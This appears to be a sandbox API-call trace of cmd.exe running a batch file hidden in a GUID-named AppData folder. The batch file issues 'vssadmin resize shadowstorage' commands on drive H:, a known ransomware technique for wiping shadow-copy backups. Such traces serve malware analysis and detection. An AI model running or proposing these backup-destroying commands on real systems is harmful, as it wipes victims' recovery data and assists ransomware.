(_String1="vssadmin", _String2="ERASE") returned 17 [0036.303] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0036.303] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0036.303] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0036.303] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0036.303] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0036.303] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0036.303] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0036.303] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0036.303] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0036.303] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0036.303] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0036.303] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0036.303] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0036.303] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0036.303] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0036.303] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0036.303] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0036.303] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0036.303] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0036.303] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0036.303] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0036.303] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0036.303] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0036.303] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0036.303] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0036.303] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0036.303] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0036.303] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0036.303] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0036.303] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0036.303] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0036.303] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0036.304] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0036.304] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0036.304] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0036.304] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0036.304] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0036.304] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0036.304] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0036.304] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0036.304] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.304] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.304] SetErrorMode (uMode=0x0) returned 0x1 [0036.304] GetProcessHeap () returned 0x3e0000 [0036.304] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0036.304] GetProcessHeap () returned 0x3e0000 [0036.304] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0036.304] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.305] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.305] GetProcessHeap () returned 0x3e0000 [0036.305] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0036.305] GetProcessHeap () returned 0x3e0000 [0036.305] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0036.305] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0036.305] GetProcessHeap () returned 0x3e0000 [0036.305] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0036.305] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.305] GetProcessHeap () returned 0x3e0000 [0036.305] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0036.305] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0036.305] GetProcessHeap () returned 0x3e0000 [0036.305] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0036.305] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.305] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.305] GetLastError () returned 0x2 [0036.305] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.305] GetLastError () returned 0x2 [0036.306] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.306] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.306] GetLastError () returned 0x2 [0036.306] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.306] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.306] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.306] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.306] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.306] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb8 [0036.306] GetProcessHeap () returned 0x3e0000 [0036.306] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x82) returned 0x3f71d0 [0036.307] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f7260 [0036.307] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f7268, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.307] SetErrorMode (uMode=0x0) returned 0x1 [0036.307] GetProcessHeap () returned 0x3e0000 [0036.307] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7260, Size=0x66) returned 0x3f7260 [0036.307] GetProcessHeap () returned 0x3e0000 [0036.307] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7260) returned 0x66 [0036.307] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.307] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.307] GetProcessHeap () returned 0x3e0000 [0036.307] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72d0 [0036.307] GetProcessHeap () returned 0x3e0000 [0036.307] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f73f8 [0036.307] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f73f8, Size=0x122) returned 0x3f73f8 [0036.307] GetProcessHeap () returned 0x3e0000 [0036.307] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f73f8) returned 0x122 [0036.307] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.307] GetProcessHeap () returned 0x3e0000 [0036.307] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7528 [0036.307] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7528, Size=0x76) returned 0x3f7528 [0036.307] GetProcessHeap () returned 0x3e0000 [0036.307] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7528) returned 0x76 [0036.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.307] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.307] GetLastError () returned 0x2 [0036.308] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.308] GetLastError () returned 0x2 [0036.308] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0036.308] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.308] GetLastError () returned 0x2 [0036.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0036.308] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.308] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.308] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.308] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.308] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0036.308] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0036.309] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0036.309] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.309] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.310] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.310] GetProcessHeap () returned 0x3e0000 [0036.310] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0036.310] GetProcessHeap () returned 0x3e0000 [0036.310] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0036.310] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.310] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xae0, dwThreadId=0xae4)) returned 1 [0036.315] CloseHandle (hObject=0x78) returned 1 [0036.315] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.315] GetProcessHeap () returned 0x3e0000 [0036.315] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.315] GetEnvironmentStringsW () returned 0x3f8408* [0036.315] GetProcessHeap () returned 0x3e0000 [0036.315] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.315] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.315] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0036.537] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0036.537] CloseHandle (hObject=0x74) returned 1 [0036.537] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0036.537] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0036.537] GetProcessHeap () returned 0x3e0000 [0036.537] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.537] GetEnvironmentStringsW () returned 0x3f8408* [0036.537] GetProcessHeap () returned 0x3e0000 [0036.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.537] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.537] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0036.537] GetProcessHeap () returned 0x3e0000 [0036.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.538] GetEnvironmentStringsW () returned 0x3f8408* [0036.538] GetProcessHeap () returned 0x3e0000 [0036.538] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.538] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.538] GetProcessHeap () returned 0x3e0000 [0036.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0036.538] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0036.538] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.538] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.538] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.538] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.538] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.538] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.539] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.539] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.539] SetConsoleInputExeNameW () returned 0x1 [0036.539] GetConsoleOutputCP () returned 0x1b5 [0036.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.539] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0036.539] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.539] SetFilePointer (in: hFile=0x74, lDistanceToMove=702, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2be [0036.539] GetProcessHeap () returned 0x3e0000 [0036.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7528 | out: hHeap=0x3e0000) returned 1 [0036.539] GetProcessHeap () returned 0x3e0000 [0036.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f73f8 | out: hHeap=0x3e0000) returned 1 [0036.539] GetProcessHeap () returned 0x3e0000 [0036.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72d0 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7260 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71d0 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0036.540] GetProcessHeap () returned 0x3e0000 [0036.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0036.540] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.540] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2be [0036.540] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1603, lpOverlapped=0x0) returned 1 [0036.540] SetFilePointer (in: hFile=0x74, lDistanceToMove=767, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0036.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=65, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\n") returned 65 [0036.540] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.540] GetFileType (hFile=0x74) returned 0x1 [0036.540] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.540] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ff [0036.540] GetProcessHeap () returned 0x3e0000 [0036.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0036.541] GetProcessHeap () returned 0x3e0000 [0036.541] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0036.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0036.541] GetProcessHeap () returned 0x3e0000 [0036.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0036.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x78) returned 0x3f0ee0 [0036.541] _tell (_FileHandle=3) returned 767 [0036.541] _close (_FileHandle=3) returned 0 [0036.541] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0036.541] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0036.541] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0036.541] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0036.541] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0036.541] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0036.541] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0036.541] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0036.541] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0036.541] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0036.541] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0036.541] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0036.541] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0036.542] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0036.542] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 